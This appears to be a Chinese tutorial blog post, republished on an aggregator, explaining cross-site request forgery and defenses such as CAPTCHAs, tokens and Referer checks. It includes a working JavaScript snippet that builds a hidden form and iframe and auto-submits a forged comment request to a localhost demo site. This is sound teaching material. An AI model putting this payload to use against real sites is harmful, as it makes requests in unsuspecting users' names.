腾讯大牛教你web前后端漏洞分析与防御-CSRF
来源:互联网 发布:横向科研 知乎 编辑:程序博客网 时间:2024/05/29 18:38
跨站请求伪造攻击CSRF(Cross Site Request Forgy)
csrf是让用户在不知情的情况,冒用其身份发起了一个请求
点击不知情链接,图片url.src
发送给http://localhost:1521/已登录用户,该用户打开就会中招iframe是防止页面跳转<script> document.write(` <form name="commentForm" target="csrf" method="post" action="http://localhost:1521/post/addComment"> <input name="postId" type="hidden" value="1"> <textarea name="content">来自CSRF!</textarea> </form>` ); var iframe = document.createElement('iframe'); iframe.name = 'csrf'; iframe.style.display = 'none'; document.body.appendChild(iframe); setTimeout(function(){ document.querySelector('[name=commentForm]').submit(); },1000); </script>
CSRF攻击原理
CSRF防御
验证码
Token
多Token解决用户打开多页面但是Token被覆盖的问题
http://www.cnblogs.com/bukudekong/p/3829875.html
验证refer(referer)(禁止来自第三方网站的请求)
- 没refer,部分网站,其他方法,根据业务
PHP防御SCRF
阅读全文
0 0
- 腾讯大牛教你web前后端漏洞分析与防御-CSRF
- 腾讯大牛教你web前后端漏洞分析与防御-XSS
- 腾讯大牛教你web前后端漏洞分析与防御-信息泄露
- 腾讯大牛教你web前后端漏洞分析与防御-Cookie
- 腾讯大牛教你web前后端漏洞分析与防御-点击劫持,传输安全
- 腾讯大牛教你web前后端漏洞分析与防御-密码安全
- 腾讯大牛教你web前后端漏洞分析与防御-接入层(SQL)注入
- 腾讯大牛教你web前后端漏洞分析与防御-接入层上传问题
- CSRF漏洞和防御
- xss漏洞和csrf漏洞防御
- 框架与CSRF防御
- CSRF攻击与防御
- CSRF攻击与防御
- CSRF攻击与防御
- CSRF攻击与防御
- CSRF攻击与防御
- CSRF攻击与防御
- CSRF攻击与防御
- MySQL 导出重复的数据
- 【笔试题】阿里前端笔试题---两列布局,不需要自适应
- vps与云服务器的区别
- java-内部类的 定义 作用 例子
- BT学习相关网址
- 腾讯大牛教你web前后端漏洞分析与防御-CSRF
- 用vue构建项目笔记7(在vue中引用公共过滤器filter)
- 【小黑屋】——总结反馈
- mybatis的分页插件pageHelper
- python编程中的if __name__ == 'main': 的作用和原理
- Apache负载均衡配置
- mysql5.5版本安装
- Python机器学习应用-北京理工大学
- hibernate之一对多